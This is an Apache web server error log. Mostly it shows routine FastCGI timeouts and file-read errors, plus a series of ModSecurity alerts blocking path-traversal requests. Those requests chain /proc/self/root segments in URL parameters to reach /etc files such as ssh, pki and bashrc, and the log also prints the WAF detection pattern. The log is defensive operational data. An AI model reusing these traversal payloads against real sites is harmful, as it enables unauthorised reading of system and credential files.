[Fri Mar 20 02:52:08.975386 2026] [mime_magic:error] [pid 17887:tid 140411699963648] (70014)End of file found: [client 57.141.18.33:44712] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:52:35.130524 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41966] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:53:06.125842 2026] [proxy_fcgi:error] [pid 7893:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42826] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:53:16.023825 2026] [:error] [pid 8307:tid 140411624429312] [client 74.7.243.128:35092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgzL-FhjpZGs9ba8qsPAAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:53:21.809818 2026] [mime_magic:error] [pid 7893:tid 140411741927168] (70014)End of file found: [client 57.141.18.113:46860] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:53:37.130963 2026] [proxy_fcgi:error] [pid 30424:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43602] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:54:07.137825 2026] [proxy_fcgi:error] [pid 21219:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44400] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:54:32.081841 2026] [proxy_fcgi:error] [pid 21219:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45060] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:54:54.329773 2026] [proxy_fcgi:error] [pid 30424:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45678] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:54:55.118991 2026] [core:alert] [pid 8307:tid 140411616036608] [client 57.141.18.60:49772] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:55:17.122406 2026] [proxy_fcgi:error] [pid 8307:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46378] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:55:41.133362 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47080] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:55:54.418674 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:36564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhavu8EFLIOrSqIpvm6wAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:55:55.693037 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.243.128:56766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhawF0L0L-SsrnPo4wGQAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:56:03.133874 2026] [proxy_fcgi:error] [pid 31215:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47758] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:56:25.129789 2026] [proxy_fcgi:error] [pid 7893:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48350] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:56:32.603051 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:58638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhkBCii7xarUs8iHYrOQAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:56:33.949503 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:56780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhkda6ubjKNq_cu4aWhgAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:56:35.473893 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:43056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhk-oXxyEfFpUF8f9MKgAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:56:39.235589 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:43062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhl_qxLDW4GITHUkSquAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:56:40.219567 2026] [:error] [pid 30424:tid 140411725141760] [client 74.7.241.31:49482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhmMt36Dv4L1GW-s-f3wAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:56:49.133785 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49054] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:56:57.995542 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:58664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhqeoXxyEfFpUF8f9MPAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:57:00.521895 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:40334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhrOoXxyEfFpUF8f9MQAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:57:02.898855 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:40336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhrta6ubjKNq_cu4aWmAAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:57:05.170742 2026] [:error] [pid 8307:tid 140411641214720] [client 74.7.241.31:40342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhsb-FhjpZGs9ba8qsmwAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:57:08.043145 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:57786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhtNa6ubjKNq_cu4aWowAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:57:12.149782 2026] [proxy_fcgi:error] [pid 7893:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49692] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:57:12.764775 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:57798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhtxCii7xarUs8iHYrUwAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:57:15.248077 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:57812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhu_qxLDW4GITHUkSqzAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:57:17.453184 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:36256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhvQF0L0L-SsrnPo4wSgAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:57:20.192660 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:36264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzhvwkwaGbbGflqUZAM6QAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:57:32.140143 2026] [mime_magic:error] [pid 31215:tid 140411540502272] (70014)End of file found: [client 57.141.18.99:55142] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:57:37.137839 2026] [proxy_fcgi:error] [pid 21219:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50486] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:57:59.133830 2026] [proxy_fcgi:error] [pid 7235:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51060] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:58:11.573425 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:36276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzh8xCii7xarUs8iHYrxgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:58:15.464620 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:45686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzh9wkwaGbbGflqUZANEwAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
